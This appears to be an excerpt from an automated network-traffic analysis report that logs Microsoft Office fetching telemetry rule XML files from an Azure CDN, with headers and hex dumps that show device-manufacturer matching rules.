                                                                                                              2024-12-05 09:38:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              24192.168.2.64975013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:23 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:23 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 472
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                              x-ms-request-id: dbf7ebc2-101e-00a2-0ac7-459f2e000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093823Z-1746fd949bdl6zq5hC1EWRf3ws000000022g000000009dfn
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:23 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              25192.168.2.64975113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:23 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:23 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 404
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                              x-ms-request-id: 1e40fce6-401e-0078-1bd2-454d34000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093823Z-1746fd949bd54zxghC1EWRzre400000002tg000000003x9m
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:23 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              26192.168.2.64975213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:23 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:23 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:23 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 468
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                                                              x-ms-request-id: 76d3483c-401e-00a3-2bcc-458b09000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093823Z-1746fd949bd6ztf6hC1EWRvq2s00000002700000000029np
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:23 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              27192.168.2.64975513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:24 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:25 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:25 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 428
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                                                              x-ms-request-id: c29bf332-501e-00a0-0ccb-459d9f000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093825Z-1746fd949bdl6zq5hC1EWRf3ws00000002a00000000000m2
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:25 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              28192.168.2.64975613.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:25 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:25 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:25 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 499
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                                                              x-ms-request-id: 167d53f1-601e-0084-47cc-456b3f000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093825Z-1746fd949bdb8xvchC1EWRmbd400000002e0000000005fc1
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:25 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              29192.168.2.64975713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:25 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:25 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:25 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 415
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                              ETag: "0x8DC582B988EBD12"
                                                                                                              x-ms-request-id: e4103400-101e-008e-08d4-45cf88000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093825Z-1746fd949bdmv56chC1EWRypnn00000002mg000000006fxb
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              30192.168.2.64975813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:25 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:25 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:25 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 471
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                              ETag: "0x8DC582BB5815C4C"
                                                                                                              x-ms-request-id: daea1f5e-401e-005b-68d1-459c0c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093825Z-1746fd949bdjzh7thC1EWR3g6400000002eg000000008k64
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              31192.168.2.64975913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:25 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:25 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:25 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 419
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                                                              x-ms-request-id: 490c4061-c01e-000b-75c3-45e255000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093825Z-1746fd949bdjzh7thC1EWR3g6400000002gg000000005xfs
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              32192.168.2.64976213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:27 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:27 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:27 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 494
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                              ETag: "0x8DC582BB8972972"
                                                                                                              x-ms-request-id: 8c022bf0-601e-0070-5bcb-45a0c9000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093827Z-1746fd949bdlqd7fhC1EWR6vt000000002mg000000007nhs
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:27 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              33192.168.2.64976313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:38:27 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:38:28 UTC470INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:38:27 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 420
                                                                                                              Connection: close
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                                                              x-ms-request-id: de9014ac-301e-0051-7cc5-4538bb000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093827Z-1746fd949bd9x4mhhC1EWRb76n00000002eg000000008rcz
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:38:28 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              34192.168.2.64976413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
